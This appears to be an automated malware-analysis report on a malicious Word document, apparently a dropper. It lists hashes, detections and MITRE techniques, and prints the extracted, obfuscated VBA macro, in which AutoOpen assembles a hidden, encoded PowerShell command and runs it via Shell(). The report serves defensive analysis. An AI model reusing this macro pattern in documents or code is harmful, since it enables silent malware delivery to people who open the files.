Office (OLE) malware analysis — malicious · 6c4467c3f2c85926

MALICIOUS

Office (OLE)

102.2 KB Created: 2018-05-28 17:15:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: dfd5948845130247b44bebcdd797de0a SHA-1: 63933aebec0ba08a82c0e0b515dee453300af7ec SHA-256: 6c4467c3f2c85926ea822a013c7e1f009c659afa0be522ce142dbb185bb75ffd

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The file contains a VBA macro with an Autoopen function that calls Shell() to execute a command. The script attempts to construct a PowerShell command, indicated by the string concatenation 'powers' + 'HeLL -WinDow' + 'sTyle hidd' + 'en -e Jg'. This suggests the macro's purpose is to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6570563-0' further supports this dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6562490-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6562490-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19779 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19779 bytes
SHA-256: `dc39ec3d09ab1fd2ab4164f5fff6ee03844e70c7bcf52436997b7d0c54f59263`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "LwizJYbfCpKN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function wFGVMUVJh() On Error Resume Next DZjKm = (ABoKA * zNDjZ - DKoHDv * Round(30200)) + (95831 - Rnd(sbBEIn) + 61408 + pWbhPo) bMjls = (RuUNap * wWkupN - anGrN * Round(38050)) + (60633 - Rnd(MwvnW) + 43097 + qMiFwb) wFGVMUVJh = paYLEkCB + HJtartZ + jvZdPzfkF + ljTtF + MiKGwzj + pFnTWvXjZcR + jPkfldlrPW + wazDL + WzZEdOG + AXTEGuZ + FhFMfaJu + uKqDzQXlun + jkQjhbFmT + LLOFrW jqhwBm = (mjsCj * oGrXYT - hWSmS * Round(14742)) + (30872 - Rnd(YQjOjs) + 13281 + KPRtv) End Function Sub Autoopen() On Error Resume Next RDkqdr = (UGjiYz * YufuW - NQIoAz * Round(65117)) + (81022 - Rnd(IGaHGF) + 29497 + cdYvE) wmGGStpZ (wFGVMUVJh) CjHsz = (PkXWIM * uwpiJ - nwaERt * Round(8100)) + (16787 - Rnd(CQzrJG) + 11675 + sHkwS) End Sub Function wmGGStpZ(AioubG) On Error Resume Next iDwuE = (GnzPB * Lcfpz - jWhHZR * Round(5923)) + (88124 - Rnd(rwWYwU) + 51728 + ATwznm) Riqsv = (ZCHrOv * bihrKj - qcqEw * Round(69837)) + (71315 - Rnd(WAtvkS) + 81079 + aKwKRt) vJwJLBHBFD = Shell(rozFfIHMph + Chr(vbKeyP) + GRXpwPH + AioubG, vbHide) hhZlP = (mHoHX * orlwL - ujGzTK * Round(44663)) + (72234 - Rnd(GjMWzw) + 25109 + XXzVI) End Function Attribute VB_Name = "tEoNtBzpOmSX" Function paYLEkCB() On Error Resume Next whTDrP = (JoYJml * bJEOq - VAOQf * Round(95697)) + (63939 - Rnd(ckDQF) + 80204 + DzFMJ) jHWTMkzT = "owers" + "HeLL -WinDow" + "sTyle hidd" + "en -e Jg" vpoMh = (cTpto * javSD - tijjE * Round(39815)) + (86992 - Rnd(vzYJzB) + 63771 + aLaDz) oIzwacJrH = "AgACg" + "AIAAkAFMASABF" + "AGwATABpAGQ" + "AWwAxAF0A" + "KwAkAHM" + "AaABlAGwATABpA" + "EQAWwAxADMAXQ" + "ArACcAeAAnACkAK" + "AAgACgAKAAiAHsA" FjnqPM = (PGkwh * aZOlU - AWcvf * Round(88904)) + (73940 - Rnd(SAksz) + 48889 + dztNF) zCscqZRjpPB = "MQAzAD" + "MAfQB7ADAA" + "fQB7ADUANQB9AH" + "sANAA5AH0AewA1" + "ADgAfQ" + "B7ADY" + "ANwB9AHsANgAw" IjtnNR = (GoLaFj * JclIwc - GOVrwI * Round(10254)) + (95445 - Rnd(VYOnsq) + 67529 + RcDQd) WdRIPhRrjDF = "AH0Ae" + "wAxAD" + "AANAB9AHsA" + "MQAxADQA" + "fQB7ADUAM" + "gB9AHsAMQA" KmQcEA = (kQcqC * XvRId - OpCrw * Round(9340)) + (35968 - Rnd(drTZZc) + 50033 + FfjAz) DJfCMJXQ = "2ADgAfQB7AD" + "gANQB9AHsAMQA" + "5AH0Aew" + "AxADQAfQB7AD" + "YAMwB9AHsAMQA" + "wADcAf" + "QB7AD" + "QANAB9AHsA" + "OQA0AH0AewAx" paYLEkCB = jHWTMkzT + oIzwacJrH + zCscqZRjpPB + WdRIPhRrjDF + DJfCMJXQ End Function Function HJtartZ() On Error Resume Next lHmzp = (LLzUa * PzIvT - mGktz * Round(6698)) + (31277 - Rnd(rMqlcc) + 22107 + EuEzO) GfazHmjH = "ADUAOQB9AH" + "sANQA5AH0AewA" + "xADIANwB9AHsAM" + "QAyADUAfQB7" + "ADEAN" + "QA4AH0AewAxADM" + "AMgB9AHsAMQ" + "A2ADcAfQB7" iRrzwS = (aDJMI * qbrKi - PhzVNr * Round(96118)) + (92906 - Rnd(uNqUI) + 84815 + TCzFw) DzrcfjwF = "ADIANAB9AHs" + "AMQAzAH0AewA" + "5ADgAfQB" + "7ADMAMgB9AHsAM" + "QA1AH0AewAyADY" + "AfQB7ADYA" QIjZT = (VbNkW * zMiwd - AVAjp * Round(36441)) + (83948 - Rnd(WRIpM) + 57141 + CQqooX) JJwVG = "NQB9AHsANQA" + "0AH0AewA4ADE" + "AfQB7ADEA" + "MgA4AH0" + "AewAxADYANgB9AH" + "sANQB9A" + "HsANA" blhcUC = (fqWYp * cMkTN - TrDTXY * Round(85301)) + (68467 - Rnd(vsHpkQ) + 89921 + wNwpr) zXWwTY = "A1AH0Ae" + "wAzADUA" + "fQB7ADgANgB9AHs" + "AMwB9AHsAO" + "AAwAH0A" + "ewAxADQAMQB9AH" + "sAOAA4" HJtartZ = GfazHmjH + DzrcfjwF + JJwVG + zXWwTY End Function Function jvZdPzfkF() On Error Resume Next blQWZG = (jXaGEs * SJEcS - jwPjF * Round(77320)) + (64739 - Rnd(lGPscA) + 55233 + HBTdGP) qIcsCA = "AH0AewA4ADc" + "AfQB7A" + "DQAOAB9AHsAN" + "gB9AHsAMQAwADEA" + "fQB7ADEAN" + "QA0AH0Aew" + "AxADUANQB9AHsAN" + "wA1AH" hijYX = (pIWWiH * VjRkYr - RKNbru * Round(69285)) + (3421 - Rnd(IpGTd) + 65871 + YQJBw) lfGJI = "0AewA" + "1ADcAfQB7AD" + "EANAA" + "wAH0AewAxADMAM" + "QB9AHsAMgA" + "wAH0AewA2A" + "DQAfQB7ADEANQA" tVwtzM = (jiEOUD * UEjdM - ENhXnz * Round(75911)) + (60059 - Rnd(UOqwTR) + 85330 + wuXaUa) zYE ... (truncated)

SHA-256: dc39ec3d09ab1fd2ab4164f5fff6ee03844e70c7bcf52436997b7d0c54f59263

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "LwizJYbfCpKN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wFGVMUVJh()
On Error Resume Next
DZjKm = (ABoKA * zNDjZ - DKoHDv * Round(30200)) + (95831 - Rnd(sbBEIn) + 61408 + pWbhPo)
bMjls = (RuUNap * wWkupN - anGrN * Round(38050)) + (60633 - Rnd(MwvnW) + 43097 + qMiFwb)
wFGVMUVJh = paYLEkCB + HJtartZ + jvZdPzfkF + ljTtF + MiKGwzj + pFnTWvXjZcR + jPkfldlrPW + wazDL + WzZEdOG + AXTEGuZ + FhFMfaJu + uKqDzQXlun + jkQjhbFmT + LLOFrW
jqhwBm = (mjsCj * oGrXYT - hWSmS * Round(14742)) + (30872 - Rnd(YQjOjs) + 13281 + KPRtv)
End Function
Sub Autoopen()
On Error Resume Next
RDkqdr = (UGjiYz * YufuW - NQIoAz * Round(65117)) + (81022 - Rnd(IGaHGF) + 29497 + cdYvE)
wmGGStpZ (wFGVMUVJh)
CjHsz = (PkXWIM * uwpiJ - nwaERt * Round(8100)) + (16787 - Rnd(CQzrJG) + 11675 + sHkwS)
End Sub
Function wmGGStpZ(AioubG)
On Error Resume Next
iDwuE = (GnzPB * Lcfpz - jWhHZR * Round(5923)) + (88124 - Rnd(rwWYwU) + 51728 + ATwznm)
Riqsv = (ZCHrOv * bihrKj - qcqEw * Round(69837)) + (71315 - Rnd(WAtvkS) + 81079 + aKwKRt)
vJwJLBHBFD = Shell(rozFfIHMph + Chr(vbKeyP) + GRXpwPH + AioubG, vbHide)
hhZlP = (mHoHX * orlwL - ujGzTK * Round(44663)) + (72234 - Rnd(GjMWzw) + 25109 + XXzVI)
End Function


Attribute VB_Name = "tEoNtBzpOmSX"
Function paYLEkCB()
On Error Resume Next
whTDrP = (JoYJml * bJEOq - VAOQf * Round(95697)) + (63939 - Rnd(ckDQF) + 80204 + DzFMJ)
jHWTMkzT = "owers" + "HeLL -WinDow" + "sTyle hidd" + "en -e Jg"
vpoMh = (cTpto * javSD - tijjE * Round(39815)) + (86992 - Rnd(vzYJzB) + 63771 + aLaDz)
oIzwacJrH = "AgACg" + "AIAAkAFMASABF" + "AGwATABpAGQ" + "AWwAxAF0A" + "KwAkAHM" + "AaABlAGwATABpA" + "EQAWwAxADMAXQ" + "ArACcAeAAnACkAK" + "AAgACgAKAAiAHsA"
FjnqPM = (PGkwh * aZOlU - AWcvf * Round(88904)) + (73940 - Rnd(SAksz) + 48889 + dztNF)
zCscqZRjpPB = "MQAzAD" + "MAfQB7ADAA" + "fQB7ADUANQB9AH" + "sANAA5AH0AewA1" + "ADgAfQ" + "B7ADY" + "ANwB9AHsANgAw"
IjtnNR = (GoLaFj * JclIwc - GOVrwI * Round(10254)) + (95445 - Rnd(VYOnsq) + 67529 + RcDQd)
WdRIPhRrjDF = "AH0Ae" + "wAxAD" + "AANAB9AHsA" + "MQAxADQA" + "fQB7ADUAM" + "gB9AHsAMQA"
KmQcEA = (kQcqC * XvRId - OpCrw * Round(9340)) + (35968 - Rnd(drTZZc) + 50033 + FfjAz)
DJfCMJXQ = "2ADgAfQB7AD" + "gANQB9AHsAMQA" + "5AH0Aew" + "AxADQAfQB7AD" + "YAMwB9AHsAMQA" + "wADcAf" + "QB7AD" + "QANAB9AHsA" + "OQA0AH0AewAx"
paYLEkCB = jHWTMkzT + oIzwacJrH + zCscqZRjpPB + WdRIPhRrjDF + DJfCMJXQ
End Function
Function HJtartZ()
On Error Resume Next
lHmzp = (LLzUa * PzIvT - mGktz * Round(6698)) + (31277 - Rnd(rMqlcc) + 22107 + EuEzO)
GfazHmjH = "ADUAOQB9AH" + "sANQA5AH0AewA" + "xADIANwB9AHsAM" + "QAyADUAfQB7" + "ADEAN" + "QA4AH0AewAxADM" + "AMgB9AHsAMQ" + "A2ADcAfQB7"
iRrzwS = (aDJMI * qbrKi - PhzVNr * Round(96118)) + (92906 - Rnd(uNqUI) + 84815 + TCzFw)
DzrcfjwF = "ADIANAB9AHs" + "AMQAzAH0AewA" + "5ADgAfQB" + "7ADMAMgB9AHsAM" + "QA1AH0AewAyADY" + "AfQB7ADYA"
QIjZT = (VbNkW * zMiwd - AVAjp * Round(36441)) + (83948 - Rnd(WRIpM) + 57141 + CQqooX)
JJwVG = "NQB9AHsANQA" + "0AH0AewA4ADE" + "AfQB7ADEA" + "MgA4AH0" + "AewAxADYANgB9AH" + "sANQB9A" + "HsANA"
blhcUC = (fqWYp * cMkTN - TrDTXY * Round(85301)) + (68467 - Rnd(vsHpkQ) + 89921 + wNwpr)
zXWwTY = "A1AH0Ae" + "wAzADUA" + "fQB7ADgANgB9AHs" + "AMwB9AHsAO" + "AAwAH0A" + "ewAxADQAMQB9AH" + "sAOAA4"
HJtartZ = GfazHmjH + DzrcfjwF + JJwVG + zXWwTY
End Function
Function jvZdPzfkF()
On Error Resume Next
blQWZG = (jXaGEs * SJEcS - jwPjF * Round(77320)) + (64739 - Rnd(lGPscA) + 55233 + HBTdGP)
qIcsCA = "AH0AewA4ADc" + "AfQB7A" + "DQAOAB9AHsAN" + "gB9AHsAMQAwADEA" + "fQB7ADEAN" + "QA0AH0Aew" + "AxADUANQB9AHsAN" + "wA1AH"
hijYX = (pIWWiH * VjRkYr - RKNbru * Round(69285)) + (3421 - Rnd(IpGTd) + 65871 + YQJBw)
lfGJI = "0AewA" + "1ADcAfQB7AD" + "EANAA" + "wAH0AewAxADMAM" + "QB9AHsAMgA" + "wAH0AewA2A" + "DQAfQB7ADEANQA"
tVwtzM = (jiEOUD * UEjdM - ENhXnz * Round(75911)) + (60059 - Rnd(UOqwTR) + 85330 + wuXaUa)
zYE
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.